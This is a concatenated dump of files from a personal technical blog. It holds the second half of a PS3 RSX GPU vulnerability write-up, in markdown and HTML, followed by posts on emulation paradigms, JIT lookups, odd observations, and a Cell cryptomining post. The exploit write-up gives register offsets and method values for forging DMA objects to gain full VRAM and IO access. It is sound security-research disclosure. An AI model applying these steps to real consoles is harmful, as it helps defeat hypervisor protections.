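    # Mirroring twice yields the original chunk, so the same formula applies.
    return vram_to_ramin(offset)
```

Under these assumptions, VRAM offset `0x0` lands at RAMIN offset `0x0FF80000`, i.e. the start of the last 512 KB chunk.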
39 |
40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The former describe engines that perform a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.); the latter describe a DMA-accessible location.
41 |
42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates a hash table known as *RAMHT*, which maps a unique handle to the RAMIN offset where the target DMA object is located.
43 |
44 | The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
45 |
46 | | Offset | Description |
47 | |-----------------------------|-------------------|
48 | | `0x00000000` - `0x0FFFFFFF` | VRAM |
49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) |
50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) |
51 |
52 | ## Exploit
53 |
54 | ### RSX MMIO register mapping
55 |
56 | The LV2 kernel provides the following syscall:
57 |
58 | ```cpp
59 | // LV2 SysCall 675 (0x2A3)
60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
61 | ```
62 |
63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
64 |
65 | | Device | MMIO | VRAM | Description | Control |
66 | |--------|----------------|------------------|-----------------|---------|
67 | | 5 | `0x08A000` | `----------` | | No |
68 | | 6 | `0x200000` | `----------` | PMEDIA | No |
69 | | 7 | `0x600000` | `----------` | PCRTC | No |
70 | | 8 | `--------` | `0x0FF10000` | | No |
71 | | 9 | `0x400000` | `----------` | PGRAPH | Yes |
72 | | 10 | `0x100000` | `----------` | PFB | Yes |
73 | | 11 | `0x00A000` | `----------` | PCOUNTER | Yes |
74 | | 12 | `0x680000` | `----------` | | Yes |
75 | | 13 | `0x090000` | `----------` | | Yes |
76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__ | __Yes__ |
77 | | 15 | `0x088000` | `----------` | IOIF | Yes |
78 |
79 | By mapping device 14, we can access the PFIFO MMIO registers from userland code (or from LV2 if `ss.param.fself.control` prevents that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some struck me as particularly dangerous if misused. These registers are described below:
80 |
81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics.
82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT.
83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO.
84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels.
85 |
86 | These register fields are described in detail in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 places RAMHT at RAMIN offset `0x10000` with a size of 16 KB, and RAMRO at RAMIN offset `0x18000` with a size of 512 bytes.
87 |
88 | ### RAMHT manipulation attempt
89 |
90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT so that other byte sequences are reinterpreted as valid entries. From the information above, RAMHT can only be relocated in the range *0x0* to *0x1F000* and must be aligned to 4 KB. In order to get a valid RAMHT entry pointing to our VRAM area, we need to find an 8-byte sequence satisfying:
91 |
92 | 1. Bits 31:23 (MSB:LSB) of the second word, read as an integer, equal 1 (i.e. our application's PFIFO channel).
93 | 2. Bits 19:0 (MSB:LSB) of the second word, read as an integer, lie in the range `[0x20000-0xFFFFF]` (mappable VRAM).
94 | 3. The RAMHT offset minus the entry offset is a multiple of 4 KB.
95 |
96 | These conditions are hard to satisfy and, aside from unlikely random values that might have been written during memtest, such sequences will not be found in this range.
97 |
98 | ### RAMRO as RAMHT entry generator
99 |
100 | However, there is still a way to get such entries into RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and must be aligned to 512 bytes. The submission of invalid PFIFO commands causes 8-byte writes to RAMRO, in which the first word holds the error report and the second word holds the submitted argument. We can control the argument and predict the error report, and are thus able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT, we should ensure that no existing entry is overwritten:
101 |
102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
104 | 3. Their corresponding RAMHT offsets for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
105 |
106 | After computing the RAMHT offsets for all pairs consisting of any handle ever created by the LV1 driver and any possible channel ID (up to the maximum of 4 that LV1 supports), we know that the driver will never place a handle in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512-byte aligned). Therefore, RAMRO can be moved inside RAMHT without fear of a collision.
107 |
108 | ### Accessing custom DMA objects
109 |
110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
111 |
112 | ```cpp
113 | 0x00880000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
114 | ```
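As a cross-check of the arithmetic, here is a small Python sketch that packs and validates the second word of a RAMHT entry. It assumes only the bit layout given in the conditions above (channel ID in bits 31:23, RAMIN offset shifted right by 4 in bits 19:0); the function names are hypothetical and any remaining bits of the word are simply left at zero. Note that `(1 << 23) | (0x800000 >> 4)` evaluates to `0x00880000`.

```python
CHANNEL_SHIFT = 23        # channel ID lives in bits 31:23 (see conditions above)
INSTANCE_MASK = 0xFFFFF   # RAMIN offset >> 4 lives in bits 19:0


def ramht_second_word(channel_id, ramin_offset):
    """Pack a channel ID and a 16-byte aligned RAMIN offset into one word."""
    assert ramin_offset % 16 == 0, "RAMIN offsets are stored in 16-byte units"
    return (channel_id << CHANNEL_SHIFT) | ((ramin_offset >> 4) & INSTANCE_MASK)


def points_to_app_vram(word, channel_id=1):
    """Check the first two conditions listed for a usable RAMHT entry."""
    channel = (word >> CHANNEL_SHIFT) & 0x1FF
    instance = word & INSTANCE_MASK
    # 0x20000 corresponds to the first RAMIN offset above 2 MB (0x200000 >> 4).
    return channel == channel_id and 0x20000 <= instance <= 0xFFFFF
```

For channel 1 and the RAMIN offset at 8 MB, `ramht_second_word(1, 0x800000)` returns `0x00880000`, which passes `points_to_app_vram`.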
115 |
116 | The only remaining step is placing our custom DMA object at that offset. Finally, a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
117 |
118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above)
119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in.
120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there.
121 |
122 | If the specified value ends up at said offset within the range specified by our DMA object, the exploit has succeeded.
123 |
--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | PS3 GPU Full VRAM/IO access exploit
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
During the early development of the PlayStation 3 emulator project Nucleus, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to LV2. This implied reverse engineering and reimplementing the kernel, and intercepting the syscalls used by user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix sys_rsx, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the lv1_gpu syscalls.
75 |
Between February 2016 and March 2016, the developer @3141card reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the Envytools/Nouveau projects and advice from @mwk eased the security analysis, resulting in the vulnerability presented here.
76 |
Reality Synthesizer
77 |
The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
78 |
| BAR  | Offset        | Size   | Description |
|------|---------------|--------|-------------|
| BAR0 | 0x28000000000 | 32 MB  | MMIO        |
| BAR1 | 0x28080000000 | 256 MB | VRAM        |
| BAR2 | 0x28002000000 | ???    | RAMIN       |
108 |
While BAR0 points to the MMIO register area, both BAR1 and BAR2 map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. The following functions can be used to convert a BAR1 offset into a BAR2 offset and vice versa:
The driver fills RAMIN with objects which can be either Engine objects or DMA objects, commonly known as FIFO objects. The former describe engines that perform a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.); the latter describe a DMA-accessible location.
124 |
Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates a hash table known as RAMHT, which maps a unique handle to the RAMIN offset where the target DMA object is located.
125 |
The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
| Device | MMIO     | VRAM       | Description | Control |
|--------|----------|------------|-------------|---------|
| 5      | 0x08A000 | ---------- |             | No      |
| 6      | 0x200000 | ---------- | PMEDIA      | No      |
| 7      | 0x600000 | ---------- | PCRTC       | No      |
| 8      | -------- | 0x0FF10000 |             | No      |
| 9      | 0x400000 | ---------- | PGRAPH      | Yes     |
| 10     | 0x100000 | ---------- | PFB         | Yes     |
| 11     | 0x00A000 | ---------- | PCOUNTER    | Yes     |
| 12     | 0x680000 | ---------- |             | Yes     |
| 13     | 0x090000 | ---------- |             | Yes     |
| 14     | 0x002000 | ---------- | PFIFO       | Yes     |
| 15     | 0x088000 | ---------- | IOIF        | Yes     |
247 |
By mapping device 14, we can access the PFIFO MMIO registers from userland code (or from LV2 if ss.param.fself.control prevents that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some struck me as particularly dangerous if misused. These registers are described below:
248 |
249 |
0x002140 NV03_PFIFO_INTR_EN_0: Disable the interrupts that trigger LV1 panics.
250 |
0x002210 NV03_PFIFO_RAMHT: Controls the size and RAMIN offset of RAMHT.
251 |
0x002218 NV03_PFIFO_RAMRO: Controls the size and RAMIN offset of RAMRO.
252 |
0x002504 NV04_PFIFO_MODE: Alternate between PIO and DMA mode in channels.
253 |
254 |
These register fields are described in detail in nv1_pfifo.xml. CellOS-LV1 places RAMHT at RAMIN offset 0x10000 with a size of 16 KB, and RAMRO at RAMIN offset 0x18000 with a size of 512 bytes.
255 |
RAMHT manipulation attempt
256 |
Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT so that other byte sequences are reinterpreted as valid entries. From the information above, RAMHT can only be relocated in the range 0x0 to 0x1F000 and must be aligned to 4 KB. In order to get a valid RAMHT entry pointing to our VRAM area, we need to find an 8-byte sequence satisfying:
257 |
258 |
Bits 31:23 (MSB:LSB) of the second word, read as an integer, equal 1 (i.e. our application's PFIFO channel).
259 |
Bits 19:0 (MSB:LSB) of the second word, read as an integer, lie in the range [0x20000-0xFFFFF] (mappable VRAM).
260 |
The RAMHT offset minus the entry offset is a multiple of 4 KB.
261 |
262 |
These conditions are hard to satisfy and, aside from unlikely random values that might have been written during memtest, such sequences will not be found in this range.
263 |
RAMRO as RAMHT entry generator
264 |
However, there is still a way to get such entries into RAMHT. RAMRO can only be relocated in the range 0x0 to 0x1FE00 and must be aligned to 512 bytes. The submission of invalid PFIFO commands causes 8-byte writes to RAMRO, in which the first word holds the error report and the second word holds the submitted argument. We can control the argument and predict the error report, and are thus able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT, we should ensure that no existing entry is overwritten:
265 |
266 |
Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
267 |
Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
268 |
Their corresponding RAMHT offsets for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
269 |
270 |
After computing the RAMHT offsets for all pairs consisting of any handle ever created by the LV1 driver and any possible channel ID (up to the maximum of 4 that LV1 supports), we know that the driver will never place a handle in the RAMHT range 0xC00 - 0xCFF (note that 0xC00 is 512-byte aligned). Therefore, RAMRO can be moved inside RAMHT without fear of a collision.
271 |
Accessing custom DMA objects
272 |
The reserved VRAM for vsh.self (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
273 |
0x00880000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
274 |
275 |
276 |
277 |
The only remaining step is placing our custom DMA object at that offset. Finally, a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
278 |
279 |
0x0060 NV406E_SET_CONTEXT_DMA_SEMAPHORE: Set DMA object handle (i.e. the 0x504010XX reports above)
280 |
0x0064 NV406E_SEMAPHORE_OFFSET: Set the offset we want to write in.
281 |
0x006C NV406E_SEMAPHORE_RELEASE: Write the specified value there.
282 |
283 |
If the specified value ends up at said offset within the range specified by our DMA object, the exploit has succeeded.
284 |
285 |
286 |
292 |
293 |
294 |
--------------------------------------------------------------------------------
/posts/2016-08-22-observations/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: live
3 | date: 2016-08-22
4 | title: Observations
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
9 |
10 | ## Light
11 |
12 | * When observing a blacklight or UV-A light, i.e. one of those blue/purple-ish lamps that make white and fluorescent objects especially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source, and with a slightly darker-blue hue. My right eye focuses correctly on the light source, but perceives it with a slightly brighter-purple color.
13 |
14 | * Making fast eye movements while keeping an LED-based white light in my field of view makes the light appear as separate red-green-blue components at different positions. Why does this happen?
15 |
16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seems to completely change this pattern. Since involuntary movements are hard to avoid, the resulting effect looks like video noise. Why does this happen?
17 |
18 |
19 | ## Climate
20 |
21 | * According to the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released into the atmosphere. The impact of methane gas is more than 25 times higher than that of carbon dioxide [2], thus resulting in devastating consequences for the whole planet. Burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the Siberian permafrost?
22 | 1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis
23 | 2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html
24 |
--------------------------------------------------------------------------------
/posts/2016-08-22-observations/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | Observations
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
74 |
Light
75 |
76 |
77 |
When observing a blacklight or UV-A light, i.e. one of those blue/purple-ish lamps that make white and fluorescent objects especially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source, and with a slightly darker-blue hue. My right eye focuses correctly on the light source, but perceives it with a slightly brighter-purple color.
78 |
79 |
80 |
Making fast eye movements while keeping an LED-based white light in my field of view makes the light appear as separate red-green-blue components at different positions. Why does this happen?
81 |
82 |
83 |
When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seems to completely change this pattern. Since involuntary movements are hard to avoid, the resulting effect looks like video noise. Why does this happen?
84 |
85 |
86 |
Climate
87 |
88 |
According to the clathrate gun hypothesis [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released into the atmosphere. The impact of methane gas is more than 25 times higher than that of carbon dioxide [2], thus resulting in devastating consequences for the whole planet. Burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the Siberian permafrost?
89 |
94 |
95 |
96 |
102 |
103 |
104 |
--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2016-09-07
4 | title: Fast lookups in JIT-compiled maps
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
9 |
10 | ## Background
11 |
12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides an MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and an MMIO offset (13-bit). Since recent userland drivers always bound engines to the same indices and there was a limited number of valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to the corresponding emulator functions.
13 |
14 | However, older or custom drivers might bind engines at different indices, making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands would have made this impossible. Since lookup times are critical, this raises the question: **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
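To make the two baseline options concrete, here is a minimal Python sketch of a runtime-built hash table and a flat 2^16-entry table. It is not the Nucleus or Jitter implementation: the exact bit layout (index in the top 3 bits, offset in the low 13 bits), the `bindings` structure and the handler values are assumptions made for illustration.

```python
def decode(command):
    """Split a 16-bit command into (index, offset).

    Assumed layout: engine index in bits 15:13, MMIO offset in bits 12:0.
    """
    return (command >> 13) & 0x7, command & 0x1FFF


def build_dict(bindings):
    """Hash-table variant: {index: {offset: handler}} -> {command: handler}."""
    return {
        (index << 13) | offset: handler
        for index, methods in bindings.items()
        for offset, handler in methods.items()
    }


def build_table(bindings):
    """Flat-array variant: one slot per possible 16-bit command."""
    table = [None] * (1 << 16)
    for command, handler in build_dict(bindings).items():
        table[command] = handler
    return table
```

The flat table trades memory for a single indexed load per lookup, which is why it stops being an option once commands grow to 32 or 64 bits.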
15 |
16 | Jitter solves this by letting the compiler decide that.
17 |
18 | ---
19 |
20 | __TODO: More information soon.__
21 |
--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | Fast lookups in JIT-compiled maps
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
74 |
Background
75 |
Some time ago, I reimplemented the RSX GPU command processor in the emulator Nucleus. This GPU is made of several engines, each bound at a specific index (0-7) of the command processor, and each index provides an MMIO register window (0x0-0x1FFC). Commands are 16-bit bitfields containing an index (3-bit) and an MMIO offset (13-bit). Since recent userland drivers always bound engines to the same indices and there was a limited number of valid MMIO offsets, our command processor was just a big hardcoded switch-case mapping commands to the corresponding emulator functions.
76 |
However, older or custom drivers might bind engines at different indices, making our compile-time switch-case useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands would have made this impossible. Since lookup times are critical, this raises the question: what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime? Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
77 |
Jitter solves this by letting the compiler decide that.
This article aims to give an intuitive understanding for the terms "Low-Level Emulation" (LLE) and "High-Level Emulation" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.
75 |
Machines are made of several layers of abstraction, each of them relying on the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):
76 |
77 |
Game
78 |
Game engine
79 |
System libraries
80 |
Kernel/drivers
81 |
Hardware
82 |
83 |
That's where these "low-level" or "high-level" terms come from. Something is more "high-level" when it has more layers of abstraction below it, and it's more "low-level" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below the hardware level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there are even higher levels, like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low or too high. Why?
84 |
Emulation paradigms
85 |
Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system is all about putting a "barrier" between two adjacent layers of abstraction. For instance:
86 |
87 |
"LLE emulators" (EPSXE, PCSX2): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.
88 |
"HLE emulators" (RPCS3, Citra): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.
89 |
90 |
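The HLE barrier can be pictured as a dispatch table that serves guest syscalls with host-side functions. The following is a toy Python sketch, not code from RPCS3 or Citra: the `HleKernel` class, the syscall number and the thread-creation handler are all hypothetical.

```python
class HleKernel:
    """Toy HLE 'kernel': guest syscalls are served by host-side functions."""

    def __init__(self):
        self.handlers = {}  # syscall number -> host function
        self.threads = []   # entry points of guest threads created so far

    def register(self, number, handler):
        self.handlers[number] = handler

    def syscall(self, number, *args):
        # This is the "barrier": the request never reaches a real guest kernel.
        handler = self.handlers.get(number)
        if handler is None:
            raise NotImplementedError("unimplemented syscall %d" % number)
        return handler(*args)


SYS_CREATE_THREAD = 1  # hypothetical syscall number

kernel = HleKernel()


def sys_create_thread(entry_point):
    """Host reimplementation of a (hypothetical) thread-creation syscall."""
    kernel.threads.append(entry_point)
    return len(kernel.threads)  # thread ID handed back to the guest


kernel.register(SYS_CREATE_THREAD, sys_create_thread)
```

Every syscall the guest software uses needs such a handler, which is where the development cost of this approach comes from; a request without one fails with `NotImplementedError` in this sketch.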
Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?
91 |
When you place this "emulation" barrier between two layers, you have to reimplement the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can execute successfully. This results in two costs that you have to balance: "development time" and "execution time". Let me explain why this balance is important with a few extreme examples of poor balances:
92 |
93 |
94 |
Too high-level: What would happen if you put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex, with several million lines of code, and it would take you centuries as a single developer to write an emulator that operated at such a high level. The "development time" would be massive, but the "execution time" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.
95 |
96 |
97 |
Too low-level: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so there would be little "development time". However, the "execution time" would be insanely high, since you would be simulating billions of transistors.
98 |
99 |
100 |
As you see, the rule of thumb is: higher-level incurs larger development costs, and lower-level incurs larger execution costs. But this is not always the case, and it has frequently led to misconceptions among end-users. One of them is wrongly estimating the performance of different emulator paradigms.
101 |
Performance myths
102 |
Let's debunk some of those performance myths: Assume you want to emulate some machine, and you are learning about its hardware/software to balance "development time" vs "execution time" and pick the right strategy. How do you estimate those costs, especially "execution time", aside from the naive rule of thumb above? Estimating how fast something will run isn't just about which levels of abstraction you are targeting. The resulting performance will depend on how many "concepts" from your guest machine (i.e. the thing you're trying to emulate) can be mapped onto your host machine (the thing that will run the emulator).
103 |
To give you an example, one such "concept" is the MMU. To explain it briefly (slightly wrong/oversimplified, but it will do for the sake of the explanation), the MMU is the thing that allows each application to have access to a slice of RAM by mapping addresses of a "virtual address space" (an imaginary arrangement of memory) to a "physical address space" (the actual RAM). Every time the application accesses memory with some CPU instruction, behind the scenes the MMU will translate the virtual address given by the application into a physical one.
104 |
105 |
106 |
HLE emulators typically don't worry about the guest MMU since guest applications only use virtual addressing and whenever they try to contact the guest kernel (e.g. to allocate more memory), the emulator takes control and very generously gives the guest application a chunk of its own host virtual memory. So everyone's happy.
107 |
108 |
109 |
LLE emulators have to worry about both the guest virtual memory and the guest physical memory. Many of them allocate guest physical memory during initialization, and do the "guest virtual memory to guest physical memory" translation by emulating the MMU in software. That causes every memory access (1 instruction) to invoke some specialized code that does the translation+access (hundreds of instructions). Of course, some translations can be cached, but the performance hit is still high. Remember that for every guest access, you have to traverse 4 layers:
110 |
111 |
Guest virtual memory
112 |
Guest physical memory
113 |
Host virtual memory
114 |
Host physical memory
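
To make that cost more tangible, here is a minimal Python sketch of a software MMU. It is only an illustration under simplifying assumptions: a single-level page table, a 4 KiB page size, and a dictionary standing in for the translation cache. The names `SoftMMU`, `map_page`, `translate`, `read8` and `write8` are made up for this example and do not come from any real emulator.

```python
PAGE_SIZE = 4096  # assumed guest page size


class SoftMMU:
    """Toy software MMU: guest virtual -> guest physical -> host buffer."""

    def __init__(self, ram_size):
        # Guest physical memory, backed by a plain host allocation
        # (which itself lives in host virtual memory).
        self.ram = bytearray(ram_size)
        self.page_table = {}  # guest virtual page -> guest physical page
        self.tlb = {}         # cache of recently used translations

    def map_page(self, vpn, ppn):
        self.page_table[vpn] = ppn
        self.tlb.pop(vpn, None)  # drop any stale cached translation

    def translate(self, vaddr):
        vpn, offset = divmod(vaddr, PAGE_SIZE)
        ppn = self.tlb.get(vpn)
        if ppn is None:
            # Slow path: walk the (here trivial) guest page table.
            if vpn not in self.page_table:
                raise MemoryError(f"guest page fault at {vaddr:#x}")
            ppn = self.page_table[vpn]
            self.tlb[vpn] = ppn
        return ppn * PAGE_SIZE + offset

    def read8(self, vaddr):
        # A single guest load becomes a translation plus a host access.
        return self.ram[self.translate(vaddr)]

    def write8(self, vaddr, value):
        self.ram[self.translate(vaddr)] = value & 0xFF
```

Even with the cache hit path, every guest access pays for a function call, a division and a dictionary lookup before touching memory, which is the overhead the paragraph above refers to.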
115 |
116 |
117 |
118 |
However, in some scenarios (this depends on MMU quirks, page sizes, etc.), you could use your host computer's own MMU to handle the accesses of the guest applications directly. One way of accomplishing this is running the guest software in a VM and having a hypervisor let it access a slice of the host computer's physical RAM directly. This would remove the need for expensive software-based address translation and result in large performance gains.
119 |
Conclusion
120 |
By making better use of the host machine's resources, in the MMU and many other areas, you can make even low-level emulation happen with acceptable performance. It's not a surprise that Sony used this strategy to emulate the PS2 on the PS3, and Microsoft to emulate the Xbox on Xbox 360 [1] and Xbox 360 on Xbox One. The idea that LLE always implies a 10x performance slowdown is a myth, resulting from many oversimplifications and/or from people who have poorly utilized the host machine's resources.
121 |
Of course, massive slowdowns can still happen: with really heterogeneous architectures, some concepts can be hard to map onto each other and you might have to resort to software emulation, incurring 10x and 100x performance penalties, but this isn't necessarily the case. There are no magic "performance penalty" numbers: everything has to be considered on a case-by-case basis, and the only way of estimating the penalty is getting to know both guest and host systems in real detail.
122 |
123 |
124 |
130 |
131 |
132 |
--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2019-02-16
4 | title: PS3/Cell Cryptomining: Wide arithmetic on SPUs
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | [TOC]
9 |
10 | ## Background
11 |
12 | Some time ago, I implemented a cryptocurrency miner for the [Cell B.E. Architecture](https://en.wikipedia.org/wiki/Cell_(microprocessor)) used in the PlayStation 3 and certain servers. Specifically, the goal was implementing PoW-algorithms based on CryptoNight, described by the [CryptoNote](https://cryptonote.org/standards/) standards and used by [Monero/XMR](https://www.getmonero.org/).
13 |
14 | At their current valuation, no such cryptocurrency can be profitably mined using consumer PlayStation 3 hardware and this situation is not expected to revert in the short/mid term. Furthermore, possible long-term changes are irrelevant, as newer hardware will increasingly outperform the Cell B.E., raising mining difficulty and the profitability threshold ever further.
15 |
16 | Consequently, I'm releasing the source code of this miner along with blog articles on technical aspects of Cell B.E. that might be of general interest (even if just for historical reasons):
17 |
18 | 1. [PS3/Cell Cryptomining: Wide arithmetic on SPUs](.).
19 | 2. [PS3/Cell Cryptomining: High-performance AES on SPUs](#). (TBD.)
20 | 3. [PS3/Cell Cryptomining: Memory Flow Controller](#). (TBD.)
21 |
22 | This first post describes the implementation of wide arithmetic operations on "narrow" ALUs present in the SPUs.
23 |
24 | ## Multiplication (64-bit)
25 |
26 | CryptoNight requires a 64-bit x 64-bit integer multiplication that results in a 128-bit integer. Implementing such an operation on the SPUs is challenging, as the largest multiplication granularity available is 16-bit x 16-bit to 32-bit due to the word-size limitations of the SPU ALUs. The following algorithm describes how to emulate such a multiplication.
27 |
28 | ### Theory
29 |
